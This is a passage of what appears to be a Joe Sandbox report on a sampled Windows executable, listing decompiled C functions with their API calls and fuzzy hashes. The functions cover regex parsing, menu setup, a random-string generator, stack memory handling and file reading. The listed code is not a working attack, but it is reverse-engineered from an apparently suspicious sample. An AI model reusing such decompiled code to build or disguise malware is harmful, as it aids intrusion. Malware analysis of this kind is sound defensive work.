                                                    					 *(_t568 - 4) =  *(_t568 - 4) & 0x00000000;
                                                    					E0040C5ED(_t568 - 0x30);
                                                    					 *(_t568 - 4) =  *(_t568 - 4) | 0xffffffff;
                                                    					E00406ED3(_t568 - 0x24);
                                                    					_t487 = 0;
                                                    					L21:
                                                    					 *[fs:0x0] =  *((intOrPtr*)(_t568 - 0xc));
                                                    					return _t487;
                                                    				}
                                                    			}















                                                    0x00405291
                                                    0x00405294
                                                    0x0040529b
                                                    0x0040529f
                                                    0x004052a4
                                                    0x004052ae
                                                    0x004052b3
                                                    0x00405245
                                                    0x00405245
                                                    0x00405246
                                                    0x00000000
                                                    0x00000000
                                                    0x004052bb
                                                    0x004052be
                                                    0x004052c2
                                                    0x004052c5
                                                    0x004052c8
                                                    0x004052ca
                                                    0x004052cc
                                                    0x004052d1
                                                    0x004052d1
                                                    0x004052d3
                                                    0x004052d3
                                                    0x004052da
                                                    0x004052df
                                                    0x004052e6
                                                    0x004052eb
                                                    0x00000000
                                                    0x00000000
                                                    0x00405377
                                                    0x00405379
                                                    0x0040537e
                                                    0x00405383
                                                    0x00405384
                                                    0x00405387
                                                    0x00405388
                                                    0x0040538a
                                                    0x0040538d
                                                    0x00405390
                                                    0x00405394
                                                    0x00405397
                                                    0x0040539c
                                                    0x00000000
                                                    0x00000000
                                                    0x004053a4
                                                    0x004053a6
                                                    0x004053ab
                                                    0x004053b0
                                                    0x004053b1
                                                    0x004053b4
                                                    0x004053b5
                                                    0x004053b7
                                                    0x004053ba
                                                    0x004053bd
                                                    0x004053c1
                                                    0x004053c4
                                                    0x004053c9
                                                    0x00000000
                                                    0x00000000
                                                    0x004053d1
                                                    0x004053d6
                                                    0x004053db
                                                    0x004053de
                                                    0x004053e1
                                                    0x004053e3
                                                    0x004053e7
                                                    0x00405400
                                                    0x00405400
                                                    0x004053e9
                                                    0x004053e9
                                                    0x004053ec
                                                    0x004053ef
                                                    0x004053f0
                                                    0x004053f5
                                                    0x004053f8
                                                    0x004053f8
                                                    0x00405402
                                                    0x00405404
                                                    0x00405407
                                                    0x0040540a
                                                    0x0040540d
                                                    0x00405411
                                                    0x00405414
                                                    0x00405418
                                                    0x0040541d
                                                    0x00405420
                                                    0x00405425
                                                    0x00405428
                                                    0x0040542b
                                                    0x00405431
                                                    0x00405435
                                                    0x00405438
                                                    0x0040543b
                                                    0x0040543d
                                                    0x0040543f
                                                    0x00405441
                                                    0x00405443
                                                    0x0040544b
                                                    0x00405450
                                                    0x00405452
                                                    0x00405455
                                                    0x00405456
                                                    0x00405457
                                                    0x0040545a
                                                    0x0040545f
                                                    0x00405462
                                                    0x00405465
                                                    0x00405467
                                                    0x0040546a
                                                    0x0040546d
                                                    0x00405471
                                                    0x00405474
                                                    0x00405479
                                                    0x0040547c
                                                    0x00405481
                                                    0x00000000
                                                    0x00000000
                                                    0x0040548a
                                                    0x0040548c
                                                    0x00405491
                                                    0x00405496
                                                    0x00405497
                                                    0x0040549a
                                                    0x0040549b
                                                    0x0040549d
                                                    0x004054a0
                                                    0x004054a3
                                                    0x004054a7
                                                    0x004054aa
                                                    0x004054af
                                                    0x00000000
                                                    0x00000000
                                                    0x00405730
                                                    0x00405733
                                                    0x00405736
                                                    0x0040573c
                                                    0x0040573f
                                                    0x00405742
                                                    0x00405745
                                                    0x00405747
                                                    0x00405749
                                                    0x0040574b
                                                    0x0040574d
                                                    0x0040574f
                                                    0x00405751
                                                    0x00405753
                                                    0x00405790
                                                    0x00405792
                                                    0x00405795
                                                    0x004058a6
                                                    0x004058a6
                                                    0x004058a9
                                                    0x004058de
                                                    0x004058e1
                                                    0x0040597f
                                                    0x00405982
                                                    0x00405a4e
                                                    0x00405a51
                                                    0x00405a8c
                                                    0x00405a8c
                                                    0x00405a8f
                                                    0x00405aca
                                                    0x00405aca
                                                    0x00405acd
                                                    0x00405b08
                                                    0x00405b08
                                                    0x00405b0b
                                                    0x00405b43
                                                    0x00405b43
                                                    0x00405b46
                                                    0x00405b7e
                                                    0x00405b7e
                                                    0x00405b81
                                                    0x00405bc1
                                                    0x00405bc1
                                                    0x00405bc2
                                                    0x00405bc3
                                                    0x00405bc8
                                                    0x00405bc9
                                                    0x00405bcb
                                                    0x00405bcc
                                                    0x00405bfd
                                                    0x00405bff
                                                    0x00405c04
                                                    0x00405c06
                                                    0x00405c09
                                                    0x00405c11
                                                    0x00405c14
                                                    0x00405c16
                                                    0x00405c19
                                                    0x00405c1c
                                                    0x00405c20
                                                    0x00405c23
                                                    0x00405c28
                                                    0x00405bce
                                                    0x00405bce
                                                    0x00405bd0
                                                    0x00405bd6
                                                    0x00405bde
                                                    0x00405be1
                                                    0x00405be3
                                                    0x00405be6
                                                    0x00405be9
                                                    0x00405bed
                                                    0x00405bf0
                                                    0x00405bf5
                                                    0x00405bf5
                                                    0x00405784
                                                    0x00405784
                                                    0x00405789
                                                    0x00000000
                                                    0x00405789
                                                    0x00405b83
                                                    0x00405b87
                                                    0x00000000
                                                    0x00000000
                                                    0x00405b89
                                                    0x00405b8a
                                                    0x00405b8d
                                                    0x00405b8f
                                                    0x00405b95
                                                    0x00405b9d
                                                    0x00405ba0
                                                    0x00405ba2
                                                    0x00405ba2
                                                    0x00405ba2
                                                    0x00405ba5
                                                    0x00405ba8
                                                    0x00405bac
                                                    0x00405baf
                                                    0x00405bb4
                                                    0x00000000
                                                    0x00405bb4
                                                    0x00405b48
                                                    0x00405b4c
                                                    0x00000000
                                                    0x00000000
                                                    0x00405b4e
                                                    0x00405b4f
                                                    0x00405b52
                                                    0x00405b54
                                                    0x00405b5a
                                                    0x00405b62
                                                    0x00405b65
                                                    0x00405b67
                                                    0x00405b6a
                                                    0x00405b6d
                                                    0x00405b71
                                                    0x00405b74
                                                    0x00405b79
                                                    0x00000000
                                                    0x00405b79
                                                    0x00405b0d
                                                    0x00405b11
                                                    0x00000000
                                                    0x00000000
                                                    0x00405b13
                                                    0x00405b14
                                                    0x00405b17
                                                    0x00405b19
                                                    0x00405b1f
                                                    0x00405b27
                                                    0x00405b2a
                                                    0x00405b2c
                                                    0x00405b2f
                                                    0x00405b32
                                                    0x00405b36
                                                    0x00405b39
                                                    0x00405b3e
                                                    0x00000000
                                                    0x00405b3e
                                                    0x00405acf
                                                    0x00405ad3
                                                    0x00000000
                                                    0x00000000
                                                    0x00405ad5
                                                    0x00405ad6
                                                    0x00405ad9
                                                    0x00405adb
                                                    0x00405ae1
                                                    0x00405ae9
                                                    0x00405aec
                                                    0x00405aee
                                                    0x00405af1
                                                    0x00405af4
                                                    0x00405af8
                                                    0x00405afb
                                                    0x00405b00
                                                    0x00000000
                                                    0x00405b00
                                                    0x00405a91
                                                    0x00405a95
                                                    0x00000000
                                                    0x00000000
                                                    0x00405a97
                                                    0x00405a98
                                                    0x00405a9b
                                                    0x00405a9d
                                                    0x00405aa3
                                                    0x00405aab
                                                    0x00405aae
                                                    0x00405ab0
                                                    0x00405ab3
                                                    0x00405ab6
                                                    0x00405aba
                                                    0x00405abd
                                                    0x00405ac2
                                                    0x00000000
                                                    0x00405ac2
                                                    0x00405a53
                                                    0x00405a57
                                                    0x00000000
                                                    0x00000000
                                                    0x00405a59
                                                    0x00405a5a
                                                    0x00405a5d
                                                    0x00405a5f
                                                    0x00405a65
                                                    0x00405a6d
                                                    0x00405a70
                                                    0x00405a72
                                                    0x00405a75
                                                    0x00405a78
                                                    0x00405a7c
                                                    0x00405a7f
                                                    0x00405a84
                                                    0x00000000
                                                    0x00405a84
                                                    0x00405988
                                                    0x0040598b
                                                    0x0040598e
                                                    0x00405994
                                                    0x00405997
                                                    0x0040599a
                                                    0x0040599c
                                                    0x0040599f
                                                    0x004059a1
                                                    0x004059a3
                                                    0x004059a5
                                                    0x004059a7
                                                    0x004059a9
                                                    0x004059ab
                                                    0x004059ad
                                                    0x004059af
                                                    0x004059b2
                                                    0x004059b4
                                                    0x004059b7
                                                    0x004059ba
                                                    0x004059c0
                                                    0x004059c6
                                                    0x004059cb
                                                    0x004059cc
                                                    0x004059cd
                                                    0x004059ce
                                                    0x004059d7
                                                    0x004059da
                                                    0x004059e1
                                                    0x004059ea
                                                    0x004059f0
                                                    0x004059f5
                                                    0x004059f6
                                                    0x00405a00
                                                    0x00405a00
                                                    0x00405a05
                                                    0x00405a07
                                                    0x00405a08
                                                    0x00405a0a
                                                    0x00405a0c
                                                    0x00405a0e
                                                    0x00405a10
                                                    0x00405a12
                                                    0x00405a15
                                                    0x00405a16
                                                    0x00405a1c
                                                    0x00405a1c
                                                    0x00405a10
                                                    0x00405a1d
                                                    0x00405a1f
                                                    0x00405a23
                                                    0x00405a27
                                                    0x00405a2f
                                                    0x00405a32
                                                    0x00405a34
                                                    0x00405a37
                                                    0x00405a3a
                                                    0x00405a3e
                                                    0x00405a41
                                                    0x00405a46
                                                    0x00000000
                                                    0x00405a46
                                                    0x004058e7
                                                    0x004058eb
                                                    0x004058ef
                                                    0x004058ef
                                                    0x004058f0
                                                    0x004058f2
                                                    0x004058f2
                                                    0x004058f5
                                                    0x004058f8
                                                    0x004058fe
                                                    0x00405901
                                                    0x00405904
                                                    0x00405907
                                                    0x00405909
                                                    0x0040590b
                                                    0x0040590d
                                                    0x0040590f
                                                    0x00405911
                                                    0x00405913
                                                    0x00405915
                                                    0x00000000
                                                    0x00000000
                                                    0x00405917
                                                    0x00405919
                                                    0x0040591b
                                                    0x00405921
                                                    0x00405921
                                                    0x00405923
                                                    0x00405929
                                                    0x00405929
                                                    0x0040592b
                                                    0x00000000
                                                    0x00000000
                                                    0x0040592d
                                                    0x0040592f
                                                    0x00000000
                                                    0x00000000
                                                    0x00405931
                                                    0x00405932
                                                    0x00405938
                                                    0x0040593b
                                                    0x0040593e
                                                    0x00405940
                                                    0x00405943
                                                    0x00405945
                                                    0x00405949
                                                    0x0040594c
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x0040594c
                                                    0x00405925
                                                    0x00405927
                                                    0x00000000

                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.262018164.0000000000401000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000004.00000002.262014608.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                    • Associated: 00000004.00000002.262018164.000000000041F000.00000040.00000001.01000000.00000004.sdmp
                                                    • Associated: 00000004.00000002.262018164.000000000044D000.00000040.00000001.01000000.00000004.sdmp
                                                    • Associated: 00000004.00000002.262018164.000000000044F000.00000040.00000001.01000000.00000004.sdmp
                                                    • Associated: 00000004.00000002.262018164.000000000047B000.00000040.00000001.01000000.00000004.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_400000_ifaie.jbxd
                                                    Similarity
                                                    • API ID: strlen$ExceptionThrow$H_prolog
                                                    • String ID: mismatched parenthesis
                                                    • API String ID: 1639010532-3804012542
                                                    • Opcode ID: d6babdc1cd365e2e1e8502f498082d8db2161f20e5f97c3c9e293608a4966727
                                                    • Instruction ID: dbdd704d0f857427ebeb39f116f656dece123dea06476c1553e1f9c4206b7acd
                                                    • Opcode Fuzzy Hash: d6babdc1cd365e2e1e8502f498082d8db2161f20e5f97c3c9e293608a4966727
                                                    • Instruction Fuzzy Hash: 1CD18F75905209DFCB04DFA4C995AEEBBB4EF44304F1080AEE816B7281DB78AE05CF65
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.262018164.0000000000401000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000004.00000002.262014608.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                    • Associated: 00000004.00000002.262018164.000000000041F000.00000040.00000001.01000000.00000004.sdmp
                                                    • Associated: 00000004.00000002.262018164.000000000044D000.00000040.00000001.01000000.00000004.sdmp
                                                    • Associated: 00000004.00000002.262018164.000000000044F000.00000040.00000001.01000000.00000004.sdmp
                                                    • Associated: 00000004.00000002.262018164.000000000047B000.00000040.00000001.01000000.00000004.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_400000_ifaie.jbxd
                                                    Similarity
                                                    • API ID: ExceptionH_prologThrowstrlentolowertoupper
                                                    • String ID: invalid range specified in character set
                                                    • API String ID: 1623458934-400550818
                                                    • Opcode ID: d408190d57219a03c27e133eefc1f35bfc50e08c6d9d172808e4cf878ccc8899
                                                    • Instruction ID: 8689beaf87658f235b18adbd55520a84ac800dc3010e3d19cb195d65f9f5d29c
                                                    • Opcode Fuzzy Hash: d408190d57219a03c27e133eefc1f35bfc50e08c6d9d172808e4cf878ccc8899
                                                    • Instruction Fuzzy Hash: A2313972540115AFCB04DF64D8916FD7BB4EF44361F10806FF966CA181C7B89A85CB68
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.262018164.0000000000401000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000004.00000002.262014608.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                    • Associated: 00000004.00000002.262018164.000000000041F000.00000040.00000001.01000000.00000004.sdmp
                                                    • Associated: 00000004.00000002.262018164.000000000044D000.00000040.00000001.01000000.00000004.sdmp
                                                    • Associated: 00000004.00000002.262018164.000000000044F000.00000040.00000001.01000000.00000004.sdmp
                                                    • Associated: 00000004.00000002.262018164.000000000047B000.00000040.00000001.01000000.00000004.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_400000_ifaie.jbxd
                                                    Similarity
                                                    • API ID: ExceptionH_prologThrowstrlentolowertoupper
                                                    • String ID: invalid range specified in character set
                                                    • API String ID: 1623458934-400550818
                                                    • Opcode ID: 0e24881944c7c0c498e365fc8964e77618a0ccef3bb12c5c82b08ac14b24d4ad
                                                    • Instruction ID: cd9e26891659f9ba17b876740d84c57d5df747751494f0963a811352e82b1091
                                                    • Opcode Fuzzy Hash: 0e24881944c7c0c498e365fc8964e77618a0ccef3bb12c5c82b08ac14b24d4ad
                                                    • Instruction Fuzzy Hash: 9E311432500155AFDB08DF64D8917FDBBB4EF44350F10806BF566DA1C1DBB89A85CBA8
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 83%
                                                    			E0040199E(void* __ecx) {
                                                    				struct HMENU__* _t19;
                                                    				void* _t22;
                                                    				struct HMENU__* _t27;
                                                    				void* _t41;
                                                    				void* _t43;
                                                    
                                                    				L004153D0();
                                                    				_push(__ecx);
                                                    				_t41 = __ecx;
                                                    				L00415232();
                                                    				_t19 = GetSystemMenu( *(__ecx + 0x20), 0);
                                                    				_push(_t19);
                                                    				L00415304();
                                                    				_t27 = _t19;
                                                    				if(_t27 != 0) {
                                                    					L004152EC();
                                                    					_push(0x65);
                                                    					 *(_t43 - 4) = 0;
                                                    					L004152FE();
                                                    					if( *((intOrPtr*)( *(_t43 - 0x10) - 8)) != 0) {
                                                    						AppendMenuA( *(_t27 + 4), 0x800, 0, 0);
                                                    						AppendMenuA( *(_t27 + 4), 0, 0x10,  *(_t43 - 0x10));
                                                    					}
                                                    					 *(_t43 - 4) =  *(_t43 - 4) | 0xffffffff;
                                                    					L00415214();
                                                    				}
                                                    				SendMessageA( *(_t41 + 0x20), 0x80, 1,  *(_t41 + 0x80));
                                                    				SendMessageA( *(_t41 + 0x20), 0x80, 0,  *(_t41 + 0x80));
                                                    				_t22 = 1;
                                                    				 *[fs:0x0] =  *((intOrPtr*)(_t43 - 0xc));
                                                    				return _t22;
                                                    			}









                                                    APIs
                                                    • _EH_prolog.MSVCRT ref: 004019A3
                                                    • GetSystemMenu.USER32(?,00000000), ref: 004019B9
                                                    • AppendMenuA.USER32(?,00000800,00000000,00000000), ref: 004019F8
                                                    • AppendMenuA.USER32(?,00000000,00000010,?), ref: 00401A04
                                                    • SendMessageA.USER32(?,00000080,00000001,?), ref: 00401A2E
                                                    • SendMessageA.USER32(?,00000080,00000000,?), ref: 00401A3C
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.262018164.0000000000401000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000004.00000002.262014608.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                    • Associated: 00000004.00000002.262018164.000000000041F000.00000040.00000001.01000000.00000004.sdmp
                                                    • Associated: 00000004.00000002.262018164.000000000044D000.00000040.00000001.01000000.00000004.sdmp
                                                    • Associated: 00000004.00000002.262018164.000000000044F000.00000040.00000001.01000000.00000004.sdmp
                                                    • Associated: 00000004.00000002.262018164.000000000047B000.00000040.00000001.01000000.00000004.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_400000_ifaie.jbxd
                                                    Similarity
                                                    • API ID: Menu$AppendMessageSend$H_prologSystem
                                                    • String ID:
                                                    • API String ID: 2469542211-0
                                                    • Opcode ID: b776af5b621d7cd78022760181e20f7924a719f0e5e1bcefeefb39d5102cff14
                                                    • Instruction ID: 5be617b225bb215d29ef40c61bba07445f241ab3afedab8fc5c110dbd8f57498
                                                    • Opcode Fuzzy Hash: b776af5b621d7cd78022760181e20f7924a719f0e5e1bcefeefb39d5102cff14
                                                    • Instruction Fuzzy Hash: FD11B232640604EBDB21ABA1CC81FDEBB71FF84B00F10452AF555660E1DBB56840DF18
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 75%
                                                    			E0040107C(intOrPtr _a4, signed int _a8) {
                                                    				void _v32;
                                                    				signed int _t19;
                                                    				signed int _t22;
                                                    				signed int _t25;
                                                    				signed int _t26;
                                                    				signed int _t29;
                                                    				signed int _t30;
                                                    				void* _t39;
                                                    				void* _t40;
                                                    
                                                    				_t26 = 6;
                                                    				memcpy( &_v32, "ekimhuqcroanflvzgdjtxypswb", _t26 << 2);
                                                    				asm("movsw");
                                                    				asm("movsb");
                                                    				srand(GetTickCount());
                                                    				_t19 = rand();
                                                    				asm("cdq");
                                                    				_t29 = 0xa;
                                                    				_t25 = _t19 % _t29;
                                                    				if(_t25 < _a8) {
                                                    					_t25 = _a8;
                                                    				}
                                                    				_t39 = 0;
                                                    				if(_t25 > 0) {
                                                    					do {
                                                    						_t22 = rand();
                                                    						asm("cdq");
                                                    						_t30 = 0x1a;
                                                    						 *((char*)(_t39 + _a4)) =  *((intOrPtr*)(_t40 + _t22 % _t30 - 0x1c));
                                                    						_t39 = _t39 + 1;
                                                    					} while (_t39 < _t25);
                                                    				}
                                                    				return _t25;
                                                    			}













                                                    APIs
                                                    Strings
                                                    • ekimhuqcroanflvzgdjtxypswb, xrefs: 00401088
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.262018164.0000000000401000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000004.00000002.262014608.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                    • Associated: 00000004.00000002.262018164.000000000041F000.00000040.00000001.01000000.00000004.sdmp
                                                    • Associated: 00000004.00000002.262018164.000000000044D000.00000040.00000001.01000000.00000004.sdmp
                                                    • Associated: 00000004.00000002.262018164.000000000044F000.00000040.00000001.01000000.00000004.sdmp
                                                    • Associated: 00000004.00000002.262018164.000000000047B000.00000040.00000001.01000000.00000004.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_400000_ifaie.jbxd
                                                    Similarity
                                                    • API ID: rand$CountTicksrand
                                                    • String ID: ekimhuqcroanflvzgdjtxypswb
                                                    • API String ID: 3923125369-3762667353
                                                    • Opcode ID: b82129336e1194dd03dfb6d02705f8909e6a668a9130fe837ce4919de25d8751
                                                    • Instruction ID: 6e7471b6b191c25231bb1943ac2c278cbb6d4f2c92849cbbbbe3a5302c238a81
                                                    • Opcode Fuzzy Hash: b82129336e1194dd03dfb6d02705f8909e6a668a9130fe837ce4919de25d8751
                                                    • Instruction Fuzzy Hash: 93F04C337043449BC720BF5A6CC4D9BBFA99B89720F01807AFD4067381C5B5944386B5
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 82%
                                                    			E00414FFF(void* __ecx, void* __eflags) {
                                                    				long _v8;
                                                    				long _v12;
                                                    				struct _MEMORY_BASIC_INFORMATION _v40;
                                                    				struct _SYSTEM_INFO _v76;
                                                    				void* _v88;
                                                    				void* _t11;
                                                    				int _t15;
                                                    				long _t17;
                                                    				void* _t18;
                                                    				void* _t25;
                                                    				void* _t34;
                                                    				void* _t37;
                                                    				void* _t41;
                                                    				void* _t42;
                                                    
                                                    				_t11 = 4;
                                                    				E00415390(_t11, __ecx);
                                                    				_t34 = _t42;
                                                    				if(VirtualQuery(_t34,  &_v40, 0x1c) == 0) {
                                                    					L2:
                                                    					_t15 = 0;
                                                    				} else {
                                                    					_t37 = _v40.AllocationBase;
                                                    					GetSystemInfo( &_v76);
                                                    					_t17 = _v76.dwPageSize;
                                                    					_v8 = _t17;
                                                    					_t41 = ( !(_t17 - 1) & _t34) - _t17;
                                                    					_t18 = E004150B3();
                                                    					asm("sbb eax, eax");
                                                    					if(_t41 >= ( ~(_t18 - 1) & 0x00001000) + 0x11000 + _t37) {
                                                    						if(E004150B3() != 1) {
                                                    							if(_t41 > _t37) {
                                                    								VirtualFree(_t37, _t41 - _t37, 0x4000);
                                                    							}
                                                    							VirtualAlloc(_t41, _v8, 0x1000, 4);
                                                    						}
                                                    						_t25 = E004150B3();
                                                    						asm("sbb eax, eax");
                                                    						_t15 = VirtualProtect(_t41, _v8, ( ~(_t25 - 1) & 0x00000103) + 1,  &_v12);
                                                    					} else {
                                                    						goto L2;
                                                    					}
                                                    				}
                                                    				return _t15;
                                                    			}


















                                                    APIs
                                                    • VirtualQuery.KERNEL32(?,?,0000001C), ref: 00415019
                                                    • GetSystemInfo.KERNEL32(?,?,?,0000001C), ref: 0041502A
                                                      • Part of subcall function 004150B3: GetVersionExA.KERNEL32(?), ref: 004150E4
                                                    • VirtualFree.KERNEL32(?,?,00004000,?,?,0000001C), ref: 00415075
                                                    • VirtualAlloc.KERNEL32(?,?,00001000,00000004,?,?,0000001C), ref: 00415086
                                                    • VirtualProtect.KERNEL32(?,?,00000000,?,?,?,0000001C), ref: 004150A5
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.262018164.0000000000401000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000004.00000002.262014608.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                    • Associated: 00000004.00000002.262018164.000000000041F000.00000040.00000001.01000000.00000004.sdmp
                                                    • Associated: 00000004.00000002.262018164.000000000044D000.00000040.00000001.01000000.00000004.sdmp
                                                    • Associated: 00000004.00000002.262018164.000000000044F000.00000040.00000001.01000000.00000004.sdmp
                                                    • Associated: 00000004.00000002.262018164.000000000047B000.00000040.00000001.01000000.00000004.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_400000_ifaie.jbxd
                                                    Similarity
                                                    • API ID: Virtual$AllocFreeInfoProtectQuerySystemVersion
                                                    • String ID:
                                                    • API String ID: 2795766573-0
                                                    • Opcode ID: 834cf1a71c9c5ed003860edc690bd353255b54ad79c9a6b5e54ee2e945d25065
                                                    • Instruction ID: 6d54ece17a00f09206e5511fc7c9e2413ccf1818c2fd634c5d4940529b78a55d
                                                    • Opcode Fuzzy Hash: 834cf1a71c9c5ed003860edc690bd353255b54ad79c9a6b5e54ee2e945d25065
                                                    • Instruction Fuzzy Hash: 61110B76A50A09EADB1167F0DD49FEF7F78EB4D385F100121FA01E3180D5389A4586D9
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 84%
                                                    			E004010DF(void* __ecx, void* __eflags, intOrPtr _a4, long _a8, intOrPtr* _a12) {
                                                    				void* _v8;
                                                    				void _v4103;
                                                    				void _v4104;
                                                    				void* _t22;
                                                    				void* _t29;
                                                    				intOrPtr* _t42;
                                                    				void* _t46;
                                                    				void* _t47;
                                                    				void* _t48;
                                                    
                                                    				E00415390(0x1004, __ecx);
                                                    				_v4104 = 0;
                                                    				memset( &_v4103, 0, 0x3ff << 2);
                                                    				_t47 = _t46 + 0xc;
                                                    				asm("stosw");
                                                    				asm("stosb");
                                                    				_t22 = CreateFileA(_a8, 0x80000000, 0, 0, 3, 0x80, 0);
                                                    				_v8 = _t22;
                                                    				if(_t22 != 0xffffffff) {
                                                    					_t42 = _a12;
                                                    					while(1) {
                                                    						_a8 = 0;
                                                    						memset( &_v4104, 0, 0x1000);
                                                    						_t48 = _t47 + 0xc;
                                                    						ReadFile(_v8,  &_v4104, 0x1000,  &_a8, 0);
                                                    						if(_a8 == 0) {
                                                    							break;
                                                    						}
                                                    						memcpy( *_t42 + _a4,  &_v4104, _a8);
                                                    						_t47 = _t48 + 0xc;
                                                    						 *_t42 =  *_t42 + _a8;
                                                    					}
                                                    					CloseHandle(_v8);
                                                    					_t29 = 1;
                                                    					return _t29;
                                                    				}
                                                    				return 0;
                                                    			}













                                                    APIs
                                                    • CreateFileA.KERNEL32(?,80000000,00000000,00000000,00000003,00000080,00000000), ref: 0040111A
                                                    • memset.MSVCRT ref: 00401141
                                                    • ReadFile.KERNEL32(?,?,00001000,?,00000000), ref: 00401159
                                                    • memcpy.MSVCRT ref: 00401174
                                                    • CloseHandle.KERNEL32(?), ref: 00401186
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.262018164.0000000000401000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000004.00000002.262014608.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                    • Associated: 00000004.00000002.262018164.000000000041F000.00000040.00000001.01000000.00000004.sdmp
                                                    • Associated: 00000004.00000002.262018164.000000000044D000.00000040.00000001.01000000.00000004.sdmp
                                                    • Associated: 00000004.00000002.262018164.000000000044F000.00000040.00000001.01000000.00000004.sdmp
                                                    • Associated: 00000004.00000002.262018164.000000000047B000.00000040.00000001.01000000.00000004.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_400000_ifaie.jbxd
                                                    Similarity
                                                    • API ID: File$CloseCreateHandleReadmemcpymemset
                                                    • String ID:
                                                    • API String ID: 3052882905-0
                                                    • Opcode ID: 35d4516e9bf1672e33f3e385a2aa10f55f2dedffe401836ef089bc25eef59cc4
                                                    • Instruction ID: b3c3ea1559986d33b90c3f3678d17a695d6118acee8a61d0ddd5dd874004b1bb
                                                    • Opcode Fuzzy Hash: 35d4516e9bf1672e33f3e385a2aa10f55f2dedffe401836ef089bc25eef59cc4
                                                    • Instruction Fuzzy Hash: 7C117F72900249BFDB128F58DC81BDA77ACEB08365F108076FB19E6190D2749B548B68
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 46%
                                                    			E00405730(intOrPtr* __ebx, signed int* __edi, char* __esi) {
                                                    				intOrPtr* _t197;
                                                    				intOrPtr _t202;
                                                    				intOrPtr _t211;
                                                    				intOrPtr _t212;
                                                    				intOrPtr _t217;
                                                    				intOrPtr _t223;
                                                    				intOrPtr _t228;
                                                    				intOrPtr _t233;
                                                    				intOrPtr _t238;
                                                    				intOrPtr _t243;
                                                    				signed char _t250;
                                                    				intOrPtr _t252;
                                                    				intOrPtr* _t268;
                                                    				intOrPtr _t270;
                                                    				intOrPtr _t273;
                                                    				void* _t274;
                                                    				intOrPtr _t278;
                                                    				void* _t286;
                                                    				intOrPtr* _t291;
                                                    				intOrPtr _t293;
                                                    				intOrPtr _t297;
                                                    				intOrPtr* _t302;
                                                    				intOrPtr _t306;
                                                    				signed int _t309;
                                                    				void* _t312;
                                                    				intOrPtr _t317;
                                                    				signed int _t319;
                                                    				signed int _t322;
                                                    				void* _t325;
                                                    				signed int _t326;
                                                    				signed int _t329;
                                                    				signed int _t332;
                                                    				signed int _t335;
                                                    				signed int _t338;
                                                    				intOrPtr* _t343;
                                                    				signed int _t345;
                                                    				signed int _t354;
                                                    				signed int _t360;
                                                    				signed int _t368;
                                                    				intOrPtr _t371;
                                                    				signed int _t372;
                                                    				signed int* _t399;
                                                    				char* _t401;
                                                    				void* _t403;
                                                    
                                                    				_t401 = __esi;
                                                    				_t399 = __edi;
                                                    				_t302 = __ebx;
                                                    				 *(_t403 + 8) = __esi[0x27];
                                                    				 *0x41720c();
                                                    				asm("sbb edx, edx");
                                                    				_t197 =  *__ebx;
                                                    				if(( ~( *( *(_t403 + 8) + 4)) &  *((intOrPtr*)( *(_t403 + 8) + 8)) +  *( *(_t403 + 8) + 4)) != _t197) {
                                                    					_t306 =  *_t197;
                                                    					if(_t306 < 0x30 || _t306 > 0x39) {
                                                    						if(_t306 != 0x65) {
                                                    							if(_t306 != 0x78) {
                                                    								if(_t306 != 0x63) {
                                                    									if(_t306 != 0x61 ||  *(_t403 + 0x13) == 0) {
                                                    										if(_t306 != 0x66 ||  *(_t403 + 0x13) == 0) {
                                                    											if(_t306 != 0x6e ||  *(_t403 + 0x13) == 0) {
                                                    												if(_t306 != 0x72 ||  *(_t403 + 0x13) == 0) {
                                                    													if(_t306 != 0x74 ||  *(_t403 + 0x13) == 0) {
                                                    														if(_t306 != 0x5c ||  *(_t403 + 0x13) == 0) {
                                                    															_push(_t399);
                                                    															_push(_t306);
                                                    															if(E00409CBB() == 0) {
                                                    																_t309 =  &(_t401[4]);
                                                    																_t202 = E00409BC5(_t401,  *((intOrPtr*)( *_t302)),  *_t399, _t309);
